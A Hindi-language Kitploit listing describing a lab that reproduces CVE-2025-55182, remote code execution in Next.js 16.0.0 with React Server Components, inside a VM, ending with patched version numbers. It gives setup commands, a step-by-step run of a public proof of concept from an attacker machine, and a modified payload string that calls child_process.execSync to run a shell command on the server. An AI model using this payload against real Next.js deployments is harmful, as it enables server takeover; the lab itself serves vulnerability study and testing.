Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-55182-poc-test — React Server Components के साथ Next.js 16.0.0 के विरुद्ध CVE-2025-55182 दूरस्थ कोड निष्पादन का प्रदर्शन करने वाली प्रतिलिपि प्रस्तुत करने योग्य प्रयोगशाला, जिसमें बाहरी शोषण निष्पादन और साइड-इफेक्ट सत्यापन शामिल है। | Kitploit
उपकरण/GitHubGitHub/jandelima/cve-2025-55182-poc-test
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

React Server Components के साथ Next.js 16.0.0 के विरुद्ध CVE-2025-55182 दूरस्थ कोड निष्पादन का प्रदर्शन करने वाली प्रतिलिपि प्रस्तुत करने योग्य प्रयोगशाला, जिसमें बाहरी शोषण निष्पादन और साइड-इफेक्ट सत्यापन शामिल है।

रिपॉजिटरी देखें
38 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 प्रदर्शन प्रयोगशाला (Next.js / React RSC RCE)

यह दस्तावेज़ Multipass Ubuntu VM के अंदर चल रहे एक असुरक्षित Next.js + React Server Components वातावरण के विरुद्ध CVE-2025-55182 रिमोट कोड एक्ज़ीक्यूशन (RCE) का प्रदर्शन करने के लिए एक पूर्ण और पुनरुत्पादक सेटअप प्रदान करता है।

एक्सप्लॉइट VM के बाहर से निष्पादित किया जाता है, जो रिमोट शोषण-क्षमता को सिद्ध करता है और पर्यावरण को असामान्य व्यवहारिक पहचान के लिए तैयार करता है।

स्रोत: https://github.com/ejpir/CVE-2025-55182-research


1. Ubuntu VM बनाएँ और तैयार करें

2. VM के अंदर बुनियादी सेटअप

2.1 सिस्टम अपडेट करें और निर्भरताएँ इंस्टॉल करें

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Node.js LTS (20.x) इंस्टॉल करें

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

सत्यापित करें:

root@kitploit:~
node -v
npm -v

2.3 ऐप के लिए एक समर्पित उपयोगकर्ता बनाएँ

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. असुरक्षित Next.js ऐप तैनात करें

3.1 कार्यशील निर्देशिका बनाएँ

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 एक न्यूनतम Next.js App Router प्रोजेक्ट जनरेट करें

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 package.json में असुरक्षित संस्करण पिन करें

निर्भरताएँ संपादित करें:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

पैकेज फिर से इंस्टॉल करें:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

सत्यापित करें:

root@kitploit:~
npm list react react-dom next

अपेक्षित आउटपुट:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 प्रोडक्शन मोड में बिल्ड और रन करें

root@kitploit:~
npm run build
npm start

अपेक्षित आउटपुट:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. बाहरी पहुंच की पुष्टि करें (हमलावर मशीन → VM)

दूसरी मशीन पर:

root@kitploit:~
curl http://10.102.169.126:3000

आपको डिफ़ॉल्ट Next.js HTML पृष्ठ प्राप्त होना चाहिए।


5. हमलावर मशीन पर PoC क्लोन करें और परीक्षण करें

5.1 रिपॉजिटरी क्लोन करें

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 PoC को सर्वर IP की ओर इंगित करें

ढूँढें:

root@kitploit:~
hostname: 'localhost',

इससे बदलें:

root@kitploit:~
hostname: '10.X.X.X',

5.3 बेसलाइन PoC चलाएँ (सरल console.log RCE)

Next अभी भी चालू रहते हुए:

root@kitploit:~
node test-simple.cjs

Next.js टर्मिनल में अपेक्षित आउटपुट:

root@kitploit:~
NON-CHUNKED-RCE

यह असुरक्षित संस्करणों का उपयोग करके React Flight के माध्यम से रिमोट कोड एक्ज़ीक्यूशन की पुष्टि करता है।

confirmed


6. दृश्यमान दुष्प्रभाव (फ़ाइल निर्माण) करने के लिए PoC संशोधित करें

लक्ष्य अवलोकनीय व्यवहार (filesystem + प्रोसेस एक्ज़ीक्यूशन) उत्पन्न करना है।

6.1 test-simple.cjs के अंदर _prefix संपादित करें

ढूँढें:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

इससे बदलें:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

नोट: निष्पादन संदर्भ में require उपलब्ध नहीं है, लेकिन process.mainModule.require() उपलब्ध है।

6.2 संशोधित एक्सप्लॉइट का परीक्षण करें

सुनिश्चित करें कि Next चल रहा है, फिर:

root@kitploit:~
node test-simple.cjs

फ़ाइल निर्माण की जाँच करें:

root@kitploit:~
ls -l /tmp/

आपको देखना चाहिए:

root@kitploit:~
cve-2025-55182-syscall

यह दुष्प्रभावों के साथ कार्यात्मक RCE की पुष्टि करता है।

start


पैच:
React ≥ 19.2.1
Next.js ≥ 16.0.7

टूल डाउनलोड करें